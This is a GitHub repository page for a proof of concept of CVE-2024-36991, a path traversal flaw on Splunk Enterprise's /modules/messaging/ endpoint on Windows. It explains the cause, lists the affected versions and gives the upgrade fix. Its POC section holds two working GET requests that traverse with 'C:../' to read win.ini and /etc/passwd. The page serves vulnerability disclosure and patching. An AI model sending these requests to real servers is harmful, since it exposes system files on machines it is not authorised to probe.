Skip to content
/ CVE-2024-36991 Public

Path Traversal On The "/Modules/Messaging/" Endpoint In Splunk Enterprise On Windows

www.cve.org/CVERecord?id=CVE-2024-36991

License

MIT license
7 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Mr-xn/CVE-2024-36991

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2024-36991

Path Traversal On The “/Modules/Messaging/“ Endpoint In Splunk Enterprise On Windows

In Splunk Enterprise versions below 9.2.2, 9.1.5, and 9.0.10, an attacker could perform a path traversal on the /modules/messaging/ endpoint in Splunk Enterprise on Windows.

The vulnerability exists because the Python os.path.join function removes the drive letter from path tokens if the drive in the token matches the drive in the built path.

This vulnerability should only affect Splunk Enterprise on Windows.

POC

GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini
GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd

Affected

affected from 9.2 before 9.2.2

affected from 9.1 before 9.1.5

affected from 9.0 before 9.0.10

Solution

Upgrade Splunk Enterprise to versions 9.2.2, 9.1.5, and 9.0.10, or higher.

Credits

Danylo Dmytriiev (DDV_UA)

References

About

Path Traversal On The "/Modules/Messaging/" Endpoint In Splunk Enterprise On Windows

www.cve.org/CVERecord?id=CVE-2024-36991

Topics

splunk cve path-traversal cve-2024 cve-2024-36991

Resources

Readme

License

MIT license
Activity

Stars

7 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published